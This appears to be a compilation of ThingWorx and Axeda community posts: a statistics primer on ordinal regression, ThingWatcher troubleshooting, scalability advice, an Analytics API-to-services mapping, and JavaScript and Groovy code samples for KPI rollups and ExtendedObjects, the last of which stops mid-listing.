
IoT & Connectivity Tips

First we need to understand the terms below.

Quantitative variable: A quantitative variable is naturally measured as a number for which meaningful arithmetic operations make sense. Examples: height, age, crop yield, GPA, salary, temperature, area, air pollution index (measured in parts per million), etc.

Categorical variable: Any variable that is not quantitative is categorical. Categorical variables take a value that is one of several possible categories. As naturally measured, categorical variables have no numerical meaning. Examples: hair color, gender, field of study, college attended, political affiliation, status of disease infection.

Ordinal variables: An ordinal variable is a categorical variable for which the possible values are ordered. Ordinal variables can be considered "in between" categorical and quantitative variables. Example: educational level might be categorized as
1: Elementary school education
2: High school graduate
3: Some college
4: College graduate
5: Graduate degree

• In this example (and for many ordinal variables), the quantitative differences between the categories are uneven, even though the differences between the labels are the same. (E.g., the difference between 1 and 2 is four years, whereas the difference between 2 and 3 could be anything from part of a year to several years.)
• Thus it does not make sense to take a mean of the values.
• Common mistake: treating ordinal variables like quantitative variables without thinking about whether this is appropriate in the particular situation at hand.

Ordinal regression: In statistics, ordinal regression (also called "ordinal classification") is a type of regression analysis used for predicting an ordinal variable. The Ordinal Regression procedure allows you to build models, generate predictions, and evaluate the importance of various predictor variables in cases where the dependent (target) variable is ordinal in nature.

Ordinal dependents and linear regression: When you are trying to predict ordinal responses, the usual linear regression models don't work very well, because they assume that the outcome (dependent) variable is measured on an interval scale. Since this is not true for ordinal outcome variables, the simplifying assumptions on which linear regression relies are not satisfied, and the regression model may not accurately reflect the relationships in the data. In particular, linear regression is sensitive to the way you define categories of the target variable. With an ordinal variable, the important thing is the ordering of categories, so if you collapse two adjacent categories into one larger category, you are making only a small change, and models built using the old and new categorizations should be very similar. Unfortunately, because linear regression is sensitive to the categorization used, a model built before merging categories could be quite different from one built after.

Below are some examples of ordered logistic regression:

Example 1: A marketing research firm wants to investigate what factors influence the size of soda (small, medium, large, or extra large) that people order at a fast-food chain. These factors may include what type of sandwich is ordered (burger or chicken), whether or not fries are also ordered, and the age of the consumer. While the outcome variable, size of soda, is obviously ordered, the difference between the various sizes is not consistent: the difference between small and medium is 10 ounces, between medium and large 8, and between large and extra large 12.

Example 2: A researcher is interested in what factors influence medaling in Olympic swimming. Relevant predictors include training hours, diet, age, and popularity of swimming in the athlete's home country. The researcher believes that the distance between gold and silver is larger than the distance between silver and bronze.

Example 3: A study looks at factors that influence the decision of whether to apply to graduate school. College juniors are asked if they are unlikely, somewhat likely, or very likely to apply to graduate school, so the outcome variable has three categories. Data on parental educational status, whether the undergraduate institution is public or private, and current GPA are also collected. The researchers have reason to believe that the "distances" between these three points are not equal; for example, the "distance" between "unlikely" and "somewhat likely" may be shorter than the distance between "somewhat likely" and "very likely".

How to use and get results with Ordinal Regression: click this link for the PDF. PDF source: http://www.norusis.com
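For reference, the model that most ordinal regression procedures fit is the proportional-odds (cumulative logit) model. This formulation is standard in the literature, though it is not spelled out in the post above:

\log\frac{P(Y \le j)}{P(Y > j)} = \alpha_j - (\beta_1 x_1 + \cdots + \beta_k x_k), \qquad j = 1, \ldots, J-1

Only the thresholds \alpha_j differ across the J-1 category boundaries; the slope coefficients \beta are shared. That is what lets the model respect the ordering of the categories without assuming the "distances" between them are equal, which is exactly the property the examples above depend on.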
This blog is intended to help diagnose and fix the most common issues that may be encountered when working with ThingWatcher. It cannot be stressed strongly enough that you should be familiar with your data, including the average time interval between data points, and the collection duration and certainty threshold you specified.

Before you start troubleshooting ThingWatcher, check that the result and training microservices are running. To test the result microservice, open a web browser and paste in the result URL: http://<IP of microservices>:<Port of results microservice>/results/models (e.g., http://localhost:8096/results/models). To test the training microservice, open a web browser and paste in the training URL: http://<IP of microservices>:<Port of training microservice>/training (e.g., http://localhost:8091/training). If you see either {"values":[],"total":0,"next":null,"previous":null} or a list of training jobs in JSON format, the result and training microservices are available.

1. Question: I haven't seen an anomaly, but I believe that my 'property' is anomalous.
This can have different causes; here are the most common:
- The certainty is too high. If the certainty is too high, ThingWatcher is conservative in its categorization of "true positives" and therefore may emit more "false negatives". Reducing the certainty will change this behavior, but note that ThingWatcher may then categorize too many "false positives" as a result. In other words, ThingWatcher may detect the desired anomalies but also some non-anomalies.
- The 'property' was anomalous during training data collection. If ThingWatcher creates a predictive model from anomalous data, it may not be able to detect the desired anomalies during MONITORING, because the data does not really appear to be anomalous; ThingWatcher treats this pattern as 'normal'. Therefore, ensure that 'property' values are non-anomalous during training.
- There are long time gaps during the monitoring state, so ThingWatcher stays in Buffering and categorizes these data points as non-anomalous.

2. Question: ThingWatcher detects an anomaly, but my 'property' is non-anomalous.
- The certainty might be too low. In this case, ThingWatcher reports anomalies when the incoming data pattern looks even slightly different from the expected data pattern.
- ThingWatcher might need more training data. If the 'property' data has a pattern that occurs over a long time span, ThingWatcher needs to collect multiple cycles of all these patterns in order to detect a true anomaly without emitting too many false positives.

3. Question: ThingWatcher is in a FAILED state. Why?
There are many possible reasons for a failed state; here are the most likely problems that can cause one:
- The training service has not been set up or is down, or, similarly, the result service is not available. You will see messages such as: messageText=Unexpected exception. {Throwable=[ConnectException: Operation timed out]} or messageText=Unexpected exception. {Throwable=[ConnectException: Connection refused]}. Note that ThingWatcher is still able to collect all training data; you will only begin to see these failed states after ThingWatcher has tried to post the training request.
- Time gaps prevent the data collection for training. You will see this warning in the log messages: "A long time gap was detected in the data that is greater than the threshold of {n}". This means you have a long gap in the training data, and ThingWatcher will recollect the data. If there are more than 3 recollections due to a long time gap, ThingWatcher transitions to a failed state and will not be able to recover. In this case you can either instruct ThingWatcher to retrain and try again, or check the data source to make sure it does not have long gaps.

4. Question: Why does ThingWatcher remain in Buffering?
There are many possible reasons for ThingWatcher to remain in Buffering, but the most likely issue is time gaps, which cause ThingWatcher to get stuck in Buffering. If the incoming data regularly contains long time gaps, you will notice that ThingWatcher keeps alternating between the monitoring and buffering states. You may need to provide better quality data, i.e., more evenly spaced data.

Source: Alex Meng, Specialist Software Engineer
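If running these checks from inside ThingWorx is more convenient than using a browser, the same availability test can be scripted in a service. This is a minimal sketch; the host and port are placeholders for your deployment:

// Fetches the same JSON the browser would show; throws if the microservice is unreachable
var models = Resources["ContentLoaderFunctions"].GetJSON({
    url: "http://localhost:8096/results/models" /* result microservice */
});
// Even an empty list ({"values":[],"total":0,...}) means the service is up and responding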
Video Author: Asia Garrouj
Original Post Date: November 29, 2016
Applicable Releases: ThingWorx Analytics 52.0 to 8.1

Description: Signals indicate the predictive strength or weakness of specific features on the goal variable. Use Signals to explore which features are important to predicting outcomes, and which are not.

Please Note: The video states that a model needs to be created prior to running Signals. As of ThingWorx Analytics 8.1, this is no longer the case.
Axeda Enterprise has long provided a feature to run custom code on the server side in response to end user requests or events triggered by data sent in by remote agents. Version 6.6 introduced Axeda Artisan, an Apache Maven-based tool that adds modern best practices to developing Axeda-based solutions, using modern code editors such as Eclipse and IntelliJ, and allowing for the use of source code control tools like Git or ClearCase. One downside to Artisan, however, is that it has no export tool: no way to take the entities that currently exist in an Axeda instance and save them.

The attached Groovy script, GetCustomObjects.groovy, solves that problem for custom objects. It will iterate over an Axeda instance and save any CustomObjects it finds to disk, for backup or to bootstrap an Artisan project from an existing instance.

{ / } » groovy GetCustomObjects.groovy
usage: getCustomObjects
 -acceptBadSSL          Ignore any TLS validation issues
 -h                     help
 -instance <instance>   instance name - directory to store results
 -password <password>   password
 -url <url>             url of Axeda Machine Cloud
 -username <username>   username

An example call might look like:

{ / } groovy GetCustomObjects.groovy -instance prod-instance -url https://prod-instance.example.com -username <uname> -password <pwd>

This will save all custom objects in a directory called prod-instance.
Video Author: Christophe Morfin
Original Post Date: June 14, 2017
Applicable Releases: ThingWorx Analytics 8.0 & 8.1

Description: In this video we show:
- How to deploy the microservices via jar files
- How to set up ThingWorx to use these microservices for anomaly detection
5 Common Mistakes to Developing Scalable IoT Applications
by Tori Firewind and the IoT EDC Team

Introduction
To build scalable applications, it's necessary to identify common mistakes and avoid them at the early stages of development. In an expert session this past month, the PTC Enterprise Deployment Team elaborated on why scalability is important and how to avoid the common development pitfalls in IoT. That video presentation has been adapted here for visual consumption of the content as well.

What is Scalability and Why Does it Matter
Enterprise-ready applications can scale and be easily maintained, which is important even from day 1, because scalability concerns are the largest cause of delays to Go Lives. Applications balance many competing requirements, and performance testing is crucial to ensure an application is ready for Go Live. However, don't just test how many remote assets can connect at once; also test any metrics that are expected to increase over time, like the number of remote properties per thing, the frequency of reporting from those properties, or the number of users accessing the system at once. Also consider how connecting more assets will affect the user experience and business logic, and not just the ability to ingest data.

Common Mistake 1: Edge Property Updates
Because ThingWorx is always listening for updates pushed from the Edge and those resources are always in use, pulling updates from the Foundation side wastes resources. Fetching from remote on every read is essentially a round trip, so it is slower and more memory intensive; there are still reasons to do it, for example if the quality tag is needed, since the cache doesn't store it. Say a property is pushed at 11:01, and then there's a network issue at 11:02. If the property is pulled from the cache, it will return the value sent at 11:01 without any indication that there is a more recent value on the Edge device. Most people will use the default options here: read from server cache, which relies on the Edge to push updates, and the VALUE push type. Configuring a threshold is a good idea as well, so that only those property updates which are truly necessary are sent to the Foundation server. Details on property aspects can be found in KCS Article 252792.

The property set approach, sending multiple property values together in a single Infotable, is well documented in another PTC Community post. This approach is necessary and considered a best practice if there is event logic which depends on multiple properties at once. Sending all of the properties needed to determine whether an event should fire in one Infotable ensures there is no need to query the database each time a property update comes in from the Edge, which ensures independent business logic and reduces the load on the database to improve ingestion performance. This is a very broad topic and future articles will address it more specifically.

The When Disconnected property aspect is a good way to configure what happens with Edge property values in a mass disconnect scenario. If revenue depends on uptime, consider losing any data that changes while a device is disconnected: all of the updates can be folded into a single value if the changes themselves aren't needed but an updated value is needed to populate remote properties upon reconnect. Many customers will want to keep all of their data, even when a device is offline, and will use data stores. In this case, consider how much data each Edge device can store (due to memory limitations on the devices themselves), and therefore how long an outage can last before data is lost anyway.
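As a rough back-of-the-envelope check (all of the numbers here are made up for illustration), the survivable outage window follows directly from the device's buffer size and reporting rate:

// Hypothetical figures; substitute the real limits of your Edge devices
var bufferBytes = 4 * 1024 * 1024;  // 4 MB available for queued updates
var bytesPerUpdate = 64;            // approximate size of one timestamped property update
var updatesPerSecond = 10;          // total reporting rate across all logged properties

// Seconds of disconnect the device can absorb before data is lost anyway
var outageWindowSec = bufferBytes / (bytesPerUpdate * updatesPerSecond);
// roughly 6,550 seconds at these rates, i.e. a little under two hours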
Also consider whether Foundation can handle the massive spike in activity when this data comes streaming in. Usually, a Connection Server isn't enough. Remember that the more data needs to be kept, the greater the potential for a thundering herd scenario.

Handling a thundering herd scenario goes beyond sizing considerations. It is absolutely crucial to randomize the delay each device will wait before attempting to reconnect, and it should be considered a requirement to have the devices connect slowly and "ramp up" over time, for multiple reasons. One is that too much data coming in too fast could overwhelm the ingestion queue and result in data loss. Another is that the business logic could demand so many system resources that the Foundation server crashes again and again and cannot be recovered. Turning off the business logic isn't possible if the downtime is unexpected, so definitely rely instead on randomized reconnection times for Edge devices.

Common Mistake 2: Overlooking Differences in HA
To accommodate a shared thing model across many servers, changes had to be made in how the thing model is stored and how the model tree is walked by the Foundation servers. Model information is no longer cached at the Thing level, and the model tree is therefore walked every time model information is needed, so the number of times a Thing is directly referenced within each service should be limited (see the Help Center for details).

It's best to store whatever information is needed from a Thing in an Infotable, making the Things[thingName] reference a single time, outside of any loops. Storing the property definitions outside of the loop prevents repetitious Thing references within the service, which otherwise would occur twice for each property (once for the name and once for the description), and then again for every single property on the Thing: a runtime nightmare.

Certain states previously held in memory are now shared across the cluster, like property values, Thing states, and connection statuses. Improvements have been made to minimize the effects of latency on queries; for instance, they now only return property values on associated Thing Shapes or Thing Templates. Filtering for properties on implementing Things is still possible, but now there is a specific service to do it, called GetThingPropertyValues (covered in detail in the Help Center).

In the script this pattern comes from (shown as an image in the original presentation and sketched below), the first step is a query to get the names of all implementing things of a particular Thing Shape. This is done outside of any loops, so once per service call. Then an Infotable is built to store what would have been a direct reference to each thing in a traditional loop. This is a very quick loop that doesn't add much runtime, since it is all in memory, with no references to the thing model or the database, instead using the results of the first query to build the Infotable. Finally, this thing-reference Infotable is passed into the new service GetThingPropertyValues to retrieve all of the property info for all of these things at once, thereby walking the thing model only once. The easiest mistake to make here is to do a direct thing reference inside of a loop, using code like Things[thingName].Get() over and over again, thereby traversing the thing model repeatedly and adding a lot of runtime. QueryImplementingThingsOptimized is another new service with new parameters for advanced configuration.
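Since the script itself appeared only as an image in the original presentation, here is a hedged reconstruction of the pattern it describes before moving on to QueryImplementingThingsOptimized. The shape name and data shape name are hypothetical, and the exact parameter names of GetThingPropertyValues are assumptions, so confirm the real signature in the Help Center:

// 1) One query, outside any loop, for all implementing things of the shape
var implementingThings = ThingShapes["MonitoredAssetShape"].QueryImplementingThings({
    maxItems: 10000
});

// 2) Build a thing-reference Infotable entirely in memory: no model walks, no database access
var thingRefs = Resources["InfoTableFunctions"].CreateInfoTableFromDataShape({
    infoTableName: "ThingRefs",
    dataShapeName: "EntityReferenceShape" /* hypothetical shape with a 'name' field */
});
for each (var row in implementingThings.rows) {
    thingRefs.AddRow({ name: row.name });
}

// 3) Retrieve the property values for every thing at once, walking the thing model a single time
//    (the parameter name here is an assumption)
var values = ThingShapes["MonitoredAssetShape"].GetThingPropertyValues({
    thingReferences: thingRefs
});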
With QueryImplementingThingsOptimized, searches can now be done on particular networks or to particular depths, and there's an offset parameter that allows a maximum number of items to be returned starting at any place in the list of Things, where previously, if you needed the Things at the end of the list, you had to return all of them. All of these options, and the restrictions that apply, are detailed in the Help Center.

Common Mistake 3: Async Service Misuse
Async services are sometimes required, say if a user has to trigger many updates on many remote things at once by the click of a button on a mashup that should not be locked up waiting for service completion. Too many async service calls, though, result in spikes in activity and competition for resources. To avoid this mistake, do not use async unless strictly necessary, and avoid launching too many async threads in parallel. A thread dump will show how many threads there are and what they are doing.

Common Mistake 4: Thread Pool Overload
Adding more threads to the pool may be beneficial in certain circumstances, like if the threads are waiting on other resources to complete their tasks, looking things up in the database (I/O), or waiting to unlock data that can only be accessed one thread at a time (property writes). In those cases the threads are waiting on other resources, and not the CPU, so adding more threads to the pool can improve performance. With too many threads, however, performance degrades due to increased contention, wasted CPU cycles, and context switches.

To check whether there are too many or too few threads in the pool, take thread dumps and time the completion of requests in the system. Also watch the subsystem memory usage, and note that the size of the queue should never approach the max. Consider monitoring the overall performance of the system (CPU and memory) with a tool like Grafana, and remember that a good performance test properly exercises all of the business logic and induces threads in a way similar to real-world expectations.

Common Mistake 5: Stream Etiquette
Upserts, or updates to database tables, are expensive operations that can interfere with ingestion if they are performed on the wrong tables. This is why Value Stream and Stream data should never be updated by end users of the application. As described in the DGIS document on best practices, aggregation is the key to unlocking optimal performance, because it reduces the size of the database tables that require upserts. Each data structure has an optimal use in a well-designed ThingWorx application.

Data Tables are great for storing overview information on all of the Things in one view, and queries on this data source are the fastest. Update this data source as often as possible (by timer), allowing enough time for updates to be gathered and any necessary calculations to be made. Data Tables can also be updated by end users directly, because rows lock one at a time during updates. Data Tables should be kept as small as possible to improve performance on mashups; for instance, consider using one to show all Things per region if there are millions of Things. Roll-up information is best stored here to avoid calculations upon mashup load, and while a real-time view of many thousands of things at once is practically impossible, this option allows for a frequently updated overview of many things, which can also drill down to other mashup views that are real-time for one Thing at a time.
Value Streams are best used for data ingestion, and queries against them should be kept to a minimum, largely performed by the roll-up logic that populates the Data Tables mentioned above. Queries that chart all of the data coming in are best placed on individual Thing views, so that only a handful of users are querying the same data sources at a time. Also be sure to use start and end dates, and make use of the "source" field, to improve query performance and create a better user experience. Due to the massive size of the corresponding database tables, it's best to avoid updating Value Streams outside of the data ingestion process altogether.

Streams are similar, but better for storing aggregated, historical data. Usually once per day or per week (outside of business hours if possible), Value Stream data is smoothed or reduced into fewer data points and then stored in Streams. This allows data to be kept for longer periods of time on the server without using up as much memory or hurting query performance. The high-volume ingested data sources can then be purged frequently, as discussed below.

Infotables are the most memory intensive, and are really designed to hold only a small number of rows at a time, usually to facilitate the business logic. Sometimes they are stored in Streams or Data Tables if they aren't expected to grow larger (see the DGIS Coffee Machine App for an example). Infotables should never be logged; if they are used to transmit Edge property updates (as in the Property Set Approach), they should be processed into other logged (usually local) properties.

Referring to the properties themselves is how to get real-time information on a mashup, say by using the GetProperties service and its auto-update option, which relies on internal websockets. This should be done on individual Thing views only, and sizing considerations need to be made if there will be many of these websockets open at once, say if many end users are viewing real-time data at the same time.

In newer versions of ThingWorx, the stream data processing settings cannot be updated directly; instead, find the system object called ThingWorxPersistenceProvider and use the service UpdateStreamDataProcessingSettings. ThingWorx Foundation processes data received from remote devices in batches in order to manage the data flow and reduce database churn, and these settings configure how large those batches are and how frequently they are flushed to the database (detailed in full in KCS Article 240607). This is very advanced configuration that depends heavily on use case and infrastructure, but some guidance applies to most situations: adjusting the scan rate is usually not beneficial; a healthy queue should never approach the max limit; and defaults differ by database because the databases function differently. InfluxDB generally works better with fewer processing threads and a higher number of things per thread, while PostgreSQL can have a lot of threads, preferably with fewer things per thread. That's why the default values are given as the same number of threads (and this can be changed), but Influx has a larger block size and size threshold, since it can handle more items per thread.

Value Streams ingest all data into the Foundation server, so the database tables that correspond with these data sources grow very large very quickly and need to be purged often, outside of business hours, usually once a day or once per week.
That's why it's important to reduce the data down to fewer points and push them into Streams for historical reference. For a span of years, a single point per day might be enough; for a span of hours, consider a data point per minute. Push aggregated data into Streams, then purge the rest as soon as it is no longer needed.
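As a minimal sketch of that daily cadence (the thing, property, stream, and data shape names are all hypothetical, and the AVERAGE_ column naming follows the Aggregate snippet's convention), a nightly timer subscription might do something like this:

// Pull the last day of raw history from the Value Stream
var history = Things["Asset001"].QueryPropertyHistory({
    maxItems: 100000,
    startDate: dateAddDays(new Date(), -1),
    endDate: new Date()
});

// Reduce the whole day to a single averaged point
var daily = Resources["InfoTableFunctions"].Aggregate({
    t: history,
    columns: "temperature",
    aggregates: "AVERAGE",
    groupByColumns: undefined
});

// Store the reduced point in a Stream for long-term reference
var values = Resources["InfoTableFunctions"].CreateInfoTableFromDataShape({
    infoTableName: "values",
    dataShapeName: "DailyRollupShape"
});
values.AddRow({ avgTemperature: daily.rows[0]["AVERAGE_temperature"] });
Things["AssetHistoryStream"].AddStreamEntry({
    values: values,
    timestamp: new Date(),
    source: me.name,
    sourceType: "Thing"
});

The raw Value Stream entries older than the retention window can then be purged on the same schedule.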
Video Author: Christophe Morfin
Original Post Date: September 13, 2016
Applicable Releases: ThingWorx Analytics 52.1 to 8.1

Description: In this video we cover the different configuration steps required for the ThingWorx Analytics Builder extension.

Please Note: This video uses Classic Composer. The same operations can be done using the New Composer starting with version 8.0, as illustrated in the Help Center. For release 8.1 the Settings menu differs from previous versions; see What's New in ThingWorx Analytics Builder 8.1, between 00:12 and 00:40, for an up-to-date menu selection.
Mapping previous versions of the ThingWorx Analytics API to ThingWorx Analytics 8.1 Services

Since ThingWorx Analytics 8.1, the classic server monolith has been replaced by a series of independent microservices. This new structure groups services around specific elements of functionality (data, training, results). The previous API commands used to access ThingWorx Analytics functions have therefore been replaced by ThingWorx Services, which exist within specific Microservice Things accessible in ThingWorx Platform 8.1.

The table below maps the most common previous API commands, from version 8.0 and earlier, to the related 8.1 services. It is not an exhaustive listing of either API commands or Services. The API commands shown are samples which might require further information, such as headers and a body, when used; they appear here for reference purposes.

1. Version Info
   Previous API: GET http://<IP Address>:8080/1.0/about/versioninfo
   8.1 Service: VersionInfo (available in each Microservice Thing inheriting from Analytics Server)
   Returns the internal version number for a specific microservice; the first two digits are the ThingWorx Core version, the next three digits the version of the microservice.

2. Registering a new Dataset
   Previous API: POST http://<IP Address>:8080/1.0/datasets/
   8.1 Service: CreateDataset (Data Microservice)
   Creates the dataset, uploads the data along with its metadata, and optimizes it automatically.

3. Checking Dataset Status
   Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>
   8.1 Service: ListCreatedDatasets (Data Microservice)
   This old functionality is replaced by a service that lists all the created datasets.

4. Creating Metadata
   Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/configuration
   8.1 Service: CreateDataset (Data Microservice; see row 2)

5. Checking Dataset Configuration
   Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>/configuration
   8.1 Service: GetDatasetSchema (Data Microservice)
   Retrieves the metadata from a dataset.

6. Loading Dataset CSV
   Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/data
   8.1 Service: CreateDataset (Data Microservice; see row 2)

7. Checking Job Status
   Previous API: GET http://<IP Address>:8080/1.0/status/<Job ID>
   8.1 Service: GetJobStatus (available in all created Microservices inheriting from AnalyticsJob Server)
   Retrieves the status of a specific job.

8. Signals Job
   Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/signals
   8.1 Service: CreateJob (Signals Microservice)
   Creates a job to identify signals.

9. Signals Result Job
   Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>/signals/<Job ID>/results
   8.1 Service: RetrieveResult (Signals Microservice)
   Retrieves the result of a Signals job.

10. Profile Job
    Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/profiles
    8.1 Service: CreateJob (Profiling Microservice)
    Creates a job to generate profiles.

11. Profile Result Job
    Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>/profiles/<Job ID>/results
    8.1 Service: RetrieveResult (Profiling Microservice)
    Retrieves the results of a profiles job.

12. Train Model Job
    Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/prediction
    8.1 Service: CreateJob (Training Microservice)
    Creates a prediction model job.

13. Train Model Result Job
    Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>/prediction/<Job ID>/results
    8.1 Service: RetrieveModel (Training Microservice)
    Only retrieves the PMML model. However, if a holdout for validation was specified in CreateJob, a validation job is auto-created and runs.

14. Scoring Job
    Previous API: POST http://<IP Address>:8080/1.0/datasets/<DataSet Name>/predictive_scores
    8.1 Service: BatchScore (Prediction Microservice)
    Submits a predictive scoring job.

15. Scoring Job Result
    Previous API: GET http://<IP Address>:8080/1.0/datasets/<DataSet Name>/predictive_scores/<Job ID>/results
    8.1 Service: RetrieveResult (Prediction Microservice)
    Retrieves results from predictive scoring jobs.
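For reference, the 8.1 services above are invoked through the standard ThingWorx REST pattern rather than the old analytics endpoints. In the same spirit as the sample syntax above, a call might look like the following; the host, Thing name, application key, and the jobId parameter name are placeholders to adapt to your own deployment:

POST http://<ThingWorx host>:<port>/Thingworx/Things/<Training Microservice Thing>/Services/GetJobStatus
Headers: Content-Type: application/json, Accept: application/json, appKey: <application key>
Body: { "jobId": "<Job ID>" }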
This is a useful trick for rolling up metrics in ThingWorx across various levels of a hierarchy by using Networks, ThingShapes, and recursive service definitions.

Say that you have a hierarchy of Things in your model, such as a Global view, a Region view, and a Store view (this could be a Mfg Plant, a Building, an Asset, etc.; whatever the core metric-producing Thing is in your model), where your Store has KPIs that you want to roll up across regions and globally.

First, create a template for each of your hierarchical levels. In my case they are GlobalTemplate, RegionalTemplate, and StoreTemplate. Add a property to your StoreTemplate that will be the KPI. Now, create a Thing for the Globe and for each of your Regions and Stores, and add them to a hierarchical Network, with the Globe at the top, the Regions below it, and the Stores below their Regions.

Now we need to create a ThingShape to aggregate our KPIs and apply it to the Global, Regional, and Store templates. We will define a recursive function on our ThingShape called GetKPI, with the following:

//define our base case, when the thing template we are on is the lowest level of our hierarchy, in this case the StoreTemplate
if (me.thingTemplate == "StoreTemplate") {
    //in our base case, the result is just the property for the metric we want to aggregate
    result = me.someMetric;
} else {
    //otherwise, we are at some other level in the hierarchy and we need to get our child connections from the network
    //this gets all the things below us in the network
    var params = {
        name: me.name /* STRING */
    };
    // result: INFOTABLE dataShape: NetworkConnection
    var network = Networks["Network"].GetChildConnections(params);
    //loop through each of the things below us in the hierarchy and recursively add the result of GetKPI() to our result
    result = 0;
    for each (var row in network.rows) {
        result += Things[row.to].GetKPI();
    }
}

This is a simple case of just summing up a single property, but we can take this further using the Union and Aggregate snippets provided by ThingWorx to do other kinds of summarization. First, add a new property called someAvgMetric to our StoreTemplate, and define a new service GetKPIProperties on the StoreTemplate, with an InfoTable result, as such:

var params = {
    propertyNames: {"items": ["someMetric", "someAvgMetric"]} /* JSON */
};
// result: INFOTABLE dataShape: "undefined"
var result = me.GetNamedProperties(params);

Now, define a new service on our ThingShape to utilize this service as our base case and aggregate the resulting InfoTable when necessary. We'll call this service GetKPIAggregates:

//define our base case
if (me.thingTemplate == "StoreTemplate") {
    //this function will be on the StoreTemplate, and returns the base infotable
    result = me.GetKPIProperties();
} else {
    //grab our network
    var params = {
        name: me.name /* STRING */
    };
    // result: INFOTABLE dataShape: NetworkConnection
    var network = Networks["Network"].GetChildConnections(params);
    //create an empty infotable to union into; I glossed over this, but you'll need a datashape here
    var result = Resources["InfoTableFunctions"].CreateInfoTableFromDataShape({
        infoTableName: "InfoTable",
        dataShapeName: "KPIDataShape"
    });
    //loop through and union each of our results into our new infotable
    for each (var row in network.rows) {
        var params = {
            t1: result /* INFOTABLE */,
            t2: Things[row.to].GetKPIAggregates() /* INFOTABLE */
        };
        var result = Resources["InfoTableFunctions"].Union(params);
    }
    //aggregate each of our fields
    var params = {
        t: result /* INFOTABLE */,
        columns: "someMetric,someAvgMetric" /* STRING */,
        aggregates: "SUM,AVERAGE" /* STRING */,
        groupByColumns: undefined /* STRING */
    };
    // result: INFOTABLE
    var result = Resources["InfoTableFunctions"].Aggregate(params);
    //loop through each of our field names and rename them to match our base infotable
    // infotable datashape iteration
    var dataShapeFields = result.dataShape.fields;
    for (var fieldName in dataShapeFields) {
        var stringName = dataShapeFields[fieldName].name;
        var params = {
            t: result /* INFOTABLE */,
            from: stringName /* STRING */,
            to: stringName.split("_")[1] /* STRING */
        };
        // result: INFOTABLE
        var result = Resources["InfoTableFunctions"].RenameField(params);
    }
}

Now, in our mashups, we can use a DynamicThingShape and call our GetKPI services at any level in our network, and our data will be aggregated correctly for whatever level we are at in the hierarchy!
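For example, assuming the hierarchy Things created above are named Globe and RegionEast (hypothetical names), any level can be rolled up the same way:

// Sum of someMetric across the entire hierarchy
var globalKpi = Things["Globe"].GetKPI();

// SUM and AVERAGE columns for a single region's subtree
var regionKpis = Things["RegionEast"].GetKPIAggregates();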
This is a collection of methods for working with ExtendedObjects, based on the functions used in Fleetster.

import com.axeda.drm.sdk.device.Device
import com.axeda.drm.sdk.device.DataItem   // note: not in the original listing, but DataItem is referenced throughout
import com.axeda.platform.sdk.v1.services.ServiceFactory
import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectSearchCriteria
import com.axeda.platform.sdk.v1.services.extobject.PropertySearchCriteria
import com.axeda.platform.sdk.v1.services.extobject.expression.PropertyExpressionFactory
import com.axeda.drm.sdk.data.CurrentDataFinder
import com.axeda.platform.sdk.v1.services.extobject.ExtendedObject
import com.axeda.platform.sdk.v1.services.extobject.Property
import java.text.DecimalFormat
import com.axeda.drm.sdk.Context
import com.axeda.drm.sdk.device.DeviceDataFinder
import com.axeda.drm.sdk.user.User
import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectService
import com.axeda.platform.sdk.v1.services.extobject.PropertyType
import com.axeda.platform.sdk.v1.services.extobject.PropertyDataType
import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectType
import com.axeda.common.sdk.id.Identifier
import groovy.time.*

/* *************************************
 * HelperFunctionsExtendedObjects.groovy
 * Extended Object retrieval/manipulation functions.
 *
 * A collection of methods for working with ExtendedObjects.
 *
 * author: sara streeter <sstreeter@axeda.com>
 ************************************* */

// NOTE: exactdatePropertySearch and fetchUserExtendedObjects are referenced
// below but were not included in this excerpt.

def eoSvc = new ServiceFactory().getExtendedObjectService()

def fetchFirstExtendedObject(DataItem dataItem, Map searchcriteria) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.extendedObjectClassName = 'com.axeda.drm.sdk.device.DataItem'
    criteria.internalObjectId = dataItem.id.value
    criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"
    def eo
    if (searchcriteria != null) {
        criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)
    }
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    if (queryResult.size() > 0) {
        eo = queryResult.first()
    }
    return eo
}

def addOrFetchExtendedDataItem(DataItem dataItem, Map searchcriteria) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.extendedObjectClassName = 'com.axeda.drm.sdk.device.DataItem'
    criteria.internalObjectId = dataItem.id.value
    criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"
    def eo
    if (searchcriteria != null) {
        criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)
    }
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    if (queryResult.size() == 0 || queryResult == null) {
        eo = new ExtendedObject()
        eo.internalObjectId = dataItem.id.value
        eo.extendedObjectType = eoSvc.findExtendedObjectTypeByClassname('com.axeda.drm.sdk.device.DataItem')
        eo.externalClientKey = "ExtendedDataItem!${dataItem.name}"
        eo = eoSvc.createExtendedObject(eo)
        searchcriteria += [eotype: "ExtendedObject"]
        createProperties(eoSvc, eo, searchcriteria)
    } else {
        eo = queryResult.first()
    }
    return eo
}

def fetchExtendedDataItem(DataItem dataItem) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.extendedObjectClassName = "com.axeda.drm.sdk.device.DataItem"
    criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"
    criteria.internalObjectId = dataItem.id.value
    def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)
    return queryResult
}

def fetchExtendedObjectsAdvancedCriteria(DataItem dataItem, Map searchcriteria, String classname, String uniqueKey) {
    def criteria = new ExtendedObjectSearchCriteria()
    criteria.extendedObjectClassName = "com.axeda.drm.sdk.device.DataItem"
